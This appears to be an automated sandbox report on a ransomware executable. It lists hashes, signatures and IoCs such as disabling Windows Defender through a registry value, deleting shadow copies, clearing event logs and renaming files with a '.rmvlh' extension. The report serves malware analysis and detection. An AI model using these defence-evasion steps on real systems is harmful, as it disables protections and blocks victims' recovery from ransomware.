Analysis
-
max time kernel
76s -
max time network
11s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
13/01/2022, 11:09
Static task
static1
Behavioral task
behavioral1
Sample
cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe
Resource
win10-en-20211208
General
-
Target
cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe
-
Size
2.5MB
-
MD5
9c156aff00fc0ac66ed918d000041932
-
SHA1
f2fc2bade3f0447ff68bf2c00dadcce1a966b4a0
-
SHA256
cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52
-
SHA512
43834c400a1a4fb83db8c16332345c86b1e568d45944b31721e9098f00dfe3be731d0661c02e103a4179cf8f35771d842d4dfa36aefd1a60f6577448f2600b02
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 1704 MpCmdRun.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\OpenAssert.tiff => C:\Users\Admin\Pictures\OpenAssert.tiff.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_9KebEnw4gEI0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Users\Admin\Pictures\OpenAssert.tiff.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_9KebEnw4gEI0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\de-DE\cpu.html cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00142_.GIF.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_9NAdTrUJeC40.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Stars.jpg cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01181_.WMF.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_Qrd4IvnJzPc0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\ja-jp.xml cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_m.png cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\es-ES\js\RSSFeeds.js cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_zh_4.4.0.v20140623020002.jar.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_ADiRQllairk0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_choosecolor.gif.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_MXZJJ4WUxnQ0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu.xml cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationRight_ButtonGraphic.png cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_rq7e2_KsCQs0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CALSO11.POC.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_f8M-jawD-IY0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\en-US\js\cpu.js cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\IN00343_.WMF.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_wWZPaLIDDeU0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\SUBMIT.JS.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_RJf62V18BVc0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-last-quarter_partly-cloudy.png cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\Project Report Type\Fancy\PLUS.GIF.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_8dkGt0xinNI0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files (x86)\Common Files\Services\verisign.bmp cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLUEPRNT\THMBNAIL.PNG.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_ljF4K7p5GvM0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\IPSEventLogMsg.dll.mui cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\DVD Maker\es-ES\DVDMaker.exe.mui cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\de-DE\calendar.html cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\1033\OFFICE10.MML.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r__MGKcq8DDRA0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18233_.WMF.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_h7T4MxsDRmc0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FORM.JS.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_WprltnpjyXY0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABON.JPG.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_3qDjTSVtFDo0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\icon.png cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\javafx-doclet.jar.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_juk-N-WIYMw0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.xml.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_TK3AtYmSjO80.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\activity16v.png cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00042_.WMF.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_K5gdYiYM_fY0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00192_.WMF.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_BR_ZN6vFapI0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01747_.GIF.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_esaxQFczKTQ0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files (x86)\Windows Media Player\ja-JP\wmlaunch.exe.mui cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_thunderstorm.png cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Chicago.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_KYzaN8XbyRw0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Funafuti.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_r2SdrmcUdkE0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\03_lastfm.luac.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_h_9LQox2V3o0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SceneButtonInset_Alpha1.png cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SKY\THMBNAIL.PNG.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_rFB-NOHF3hA0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN109.XML.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_g14wyIsXjQ40.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Noronha.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_iYtaBE56RB00.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0282126.WMF.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_MNBjHMEZzQQ0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\button_mid.gif.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_UGPjbt12ic80.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\MAIN.XML.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_DEUeS8swjTI0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\FAX\OrielFax.Dotx.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_sa1y37L73aE0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-core.xml.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_zvTl_2HK4Zo0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-heapwalker.xml.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_3H_x3N34MjM0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_335IA03UFWw0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\es-ES\css\cpu.css cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\prev_rest.png cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SL00256_.WMF.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_C7HNnOm9oms0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TN00330_.WMF.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_PM1W1QnOLZU0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14790_.GIF.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_TC6ECwCeRb40.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\HST10.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_GGmywEV8mYk0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.win32.nl_ja_4.4.0.v20140623020002.jar.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r__ygF8GhN0Nw0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Dawson.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_zQuZxzJAfA40.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_Casual.gif.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_viXym954DZc0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\es-ES\css\picturePuzzle.css cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\css\RSSFeeds.css cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\1033\VBOB6.CHM.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_uVD9FKTWw9k0.rmvlh cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 772 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1444 powershell.exe 1868 powershell.exe 1352 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 1284 wevtutil.exe Token: SeBackupPrivilege 1284 wevtutil.exe Token: SeSecurityPrivilege 1256 wevtutil.exe Token: SeBackupPrivilege 1256 wevtutil.exe Token: SeSecurityPrivilege 1716 wevtutil.exe Token: SeBackupPrivilege 1716 wevtutil.exe Token: SeIncreaseQuotaPrivilege 896 wmic.exe Token: SeSecurityPrivilege 896 wmic.exe Token: SeTakeOwnershipPrivilege 896 wmic.exe Token: SeLoadDriverPrivilege 896 wmic.exe Token: SeSystemProfilePrivilege 896 wmic.exe Token: SeSystemtimePrivilege 896 wmic.exe Token: SeProfSingleProcessPrivilege 896 wmic.exe Token: SeIncBasePriorityPrivilege 896 wmic.exe Token: SeCreatePagefilePrivilege 896 wmic.exe Token: SeBackupPrivilege 896 wmic.exe Token: SeRestorePrivilege 896 wmic.exe Token: SeShutdownPrivilege 896 wmic.exe Token: SeDebugPrivilege 896 wmic.exe Token: SeSystemEnvironmentPrivilege 896 wmic.exe Token: SeRemoteShutdownPrivilege 896 wmic.exe Token: SeUndockPrivilege 896 wmic.exe Token: SeManageVolumePrivilege 896 wmic.exe Token: 33 896 wmic.exe Token: 34 896 wmic.exe Token: 35 896 wmic.exe Token: SeIncreaseQuotaPrivilege 520 wmic.exe Token: SeSecurityPrivilege 520 wmic.exe Token: SeTakeOwnershipPrivilege 520 wmic.exe Token: SeLoadDriverPrivilege 520 wmic.exe Token: SeSystemProfilePrivilege 520 wmic.exe Token: SeSystemtimePrivilege 520 wmic.exe Token: SeProfSingleProcessPrivilege 520 wmic.exe Token: SeIncBasePriorityPrivilege 520 wmic.exe Token: SeCreatePagefilePrivilege 520 wmic.exe Token: SeBackupPrivilege 520 wmic.exe Token: SeRestorePrivilege 520 wmic.exe Token: SeShutdownPrivilege 520 wmic.exe Token: SeDebugPrivilege 520 wmic.exe Token: SeSystemEnvironmentPrivilege 520 wmic.exe Token: SeRemoteShutdownPrivilege 520 wmic.exe Token: SeUndockPrivilege 520 wmic.exe Token: SeManageVolumePrivilege 520 wmic.exe Token: 33 520 wmic.exe Token: 34 520 wmic.exe Token: 35 520 wmic.exe Token: SeIncreaseQuotaPrivilege 520 wmic.exe Token: SeSecurityPrivilege 520 wmic.exe Token: SeTakeOwnershipPrivilege 520 wmic.exe Token: SeLoadDriverPrivilege 520 wmic.exe Token: SeSystemProfilePrivilege 520 wmic.exe Token: SeSystemtimePrivilege 520 wmic.exe Token: SeProfSingleProcessPrivilege 520 wmic.exe Token: SeIncBasePriorityPrivilege 520 wmic.exe Token: SeCreatePagefilePrivilege 520 wmic.exe Token: SeBackupPrivilege 520 wmic.exe Token: SeRestorePrivilege 520 wmic.exe Token: SeShutdownPrivilege 520 wmic.exe Token: SeDebugPrivilege 520 wmic.exe Token: SeSystemEnvironmentPrivilege 520 wmic.exe Token: SeRemoteShutdownPrivilege 520 wmic.exe Token: SeUndockPrivilege 520 wmic.exe Token: SeManageVolumePrivilege 520 wmic.exe Token: 33 520 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1352 wrote to memory of 1656 1352 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe 27 PID 1352 wrote to memory of 1656 1352 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe 27 PID 1352 wrote to memory of 1656 1352 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe 27 PID 1352 wrote to memory of 1656 1352 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe 27 PID 1656 wrote to memory of 1060 1656 net.exe 29 PID 1656 wrote to memory of 1060 1656 net.exe 29 PID 1656 wrote to memory of 1060 1656 net.exe 29 PID 1656 wrote to memory of 1060 1656 net.exe 29 PID 1352 wrote to memory of 560 1352 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe 30 PID 1352 wrote to memory of 560 1352 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe 30 PID 1352 wrote to memory of 560 1352 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe 30 PID 1352 wrote to memory of 560 1352 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe 30 PID 560 wrote to memory of 568 560 net.exe 32 PID 560 wrote to memory of 568 560 net.exe 32 PID 560 wrote to memory of 568 560 net.exe 32 PID 560 wrote to memory of 568 560 net.exe 32 PID 1352 wrote to memory of 1092 1352 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe 33 PID 1352 wrote to memory of 1092 1352 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe 33 PID 1352 wrote to memory of 1092 1352 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe 33 PID 1352 wrote to memory of 1092 1352 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe 33 PID 1092 wrote to memory of 888 1092 net.exe 35 PID 1092 wrote to memory of 888 1092 net.exe 35 PID 1092 wrote to memory of 888 1092 net.exe 35 PID 1092 wrote to memory of 888 1092 net.exe 35 PID 1352 wrote to memory of 1836 1352 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe 36 PID 1352 wrote to memory of 1836 1352 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe 36 PID 1352 wrote to memory of 1836 1352 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe 36 PID 1352 wrote to memory of 1836 1352 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe 36 PID 1836 wrote to memory of 1604 1836 net.exe 38 PID 1836 wrote to memory of 1604 1836 net.exe 38 PID 1836 wrote to memory of 1604 1836 net.exe 38 PID 1836 wrote to memory of 1604 1836 net.exe 38 PID 1352 wrote to memory of 1792 1352 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe 39 PID 1352 wrote to memory of 1792 1352 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe 39 PID 1352 wrote to memory of 1792 1352 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe 39 PID 1352 wrote to memory of 1792 1352 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe 39 PID 1792 wrote to memory of 432 1792 net.exe 41 PID 1792 wrote to memory of 432 1792 net.exe 41 PID 1792 wrote to memory of 432 1792 net.exe 41 PID 1792 wrote to memory of 432 1792 net.exe 41 PID 1352 wrote to memory of 744 1352 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe 42 PID 1352 wrote to memory of 744 1352 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe 42 PID 1352 wrote to memory of 744 1352 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe 42 PID 1352 wrote to memory of 744 1352 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe 42 PID 744 wrote to memory of 1752 744 net.exe 44 PID 744 wrote to memory of 1752 744 net.exe 44 PID 744 wrote to memory of 1752 744 net.exe 44 PID 744 wrote to memory of 1752 744 net.exe 44 PID 1352 wrote to memory of 964 1352 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe 45 PID 1352 wrote to memory of 964 1352 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe 45 PID 1352 wrote to memory of 964 1352 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe 45 PID 1352 wrote to memory of 964 1352 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe 45 PID 964 wrote to memory of 1532 964 net.exe 47 PID 964 wrote to memory of 1532 964 net.exe 47 PID 964 wrote to memory of 1532 964 net.exe 47 PID 964 wrote to memory of 1532 964 net.exe 47 PID 1352 wrote to memory of 1928 1352 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe 48 PID 1352 wrote to memory of 1928 1352 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe 48 PID 1352 wrote to memory of 1928 1352 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe 48 PID 1352 wrote to memory of 1928 1352 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe 48 PID 1928 wrote to memory of 1812 1928 net.exe 50 PID 1928 wrote to memory of 1812 1928 net.exe 50 PID 1928 wrote to memory of 1812 1928 net.exe 50 PID 1928 wrote to memory of 1812 1928 net.exe 50
Processes
-
C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe"C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe"1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
